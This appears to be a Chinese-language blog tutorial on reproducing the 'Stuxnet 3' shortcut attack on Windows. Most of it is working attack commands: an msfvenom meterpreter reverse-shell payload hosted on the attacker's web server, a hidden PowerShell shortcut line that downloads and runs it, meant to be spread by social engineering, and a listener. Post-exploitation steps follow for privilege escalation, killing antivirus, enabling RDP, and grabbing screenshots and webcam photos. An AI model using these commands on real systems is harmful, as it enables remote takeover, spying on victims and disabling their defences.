震网三代 漏洞复现

时间:2023-01-16 11:04:38


准备

  1. 一台kali虚拟机
  2. 一下任意一台可复现该漏洞的电脑:
  1. 可复现的操作系统版本
  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1511 for 32-bit Systems
  • Microsoft Windows 10 version 1511 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1

还有win10 企业版 2015长期服务方案

  1. 可复现的服务器系统版本
  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

具体操作

打开msf

msfconsole

在root下创建msf后门;

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=攻击机的ip lport= 攻击机的端口 -f psh-reflection>/var/www/html/link.ps1


注意: 如果想看文件, 就到这里:

cd /var/www/html
ls

kali下开启Apache2

service apache2 start

震网三代 漏洞复现

通过社工传播快捷方式的传播

在准备好的 win10上 , 创建快捷方式, 填入:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://攻击机的ip/link.ps1');link.ps1"

震网三代 漏洞复现

震网三代 漏洞复现

也可以自行重命名, 此处就叫左面了

震网三代 漏洞复现

开始监听

use exploit/multi/handler

设置payload

输入:

set payload windows/x64/meterpreter/reverse_tcp

在输入:

options

接着, 根据提示, 设置 lhost 和 lport ** , 也就是之前设置的要是用的攻击机的ip** 和 攻击机的端口

这里的端口需要和刚才生成的后门的端口一致.

开始执行

直接输入:

run 

# 也可以用
exploit

点击win11的快捷图标

震网三代 漏洞复现

这个代表成功啦!


后渗透测试阶段命令

# 如果对面显示过来的有乱码
shell
chcp 65001

# 进入桌面
cd users/mb/desktop

# 查看进程
ps

# 查看当前进程号
getpid

# 查看系统信息
sysinfo

# 查看目标机是否为虚拟机
run post/windows/gather/checkvm

# 查看完整网络设置
route

# 查看当前权限
getuid

# 自动提权
getsystem


# 关闭杀毒软件
run post/windows/manage/killav


# 启动远程桌面协议
run post/windows/manage/enable_rdp


# 列举当前登录的用户
run post/windows/gather/enum_logged_on_users


# 查看当前应用程序
run post/windows/gather/enum_applications


# 抓取目标机的屏幕截图
load espia ; screengrab


# 抓取摄像头的照片
webcam_snap


# 查看当前处于目标机的那个目录
pwd


# 查看当前目录
getlwd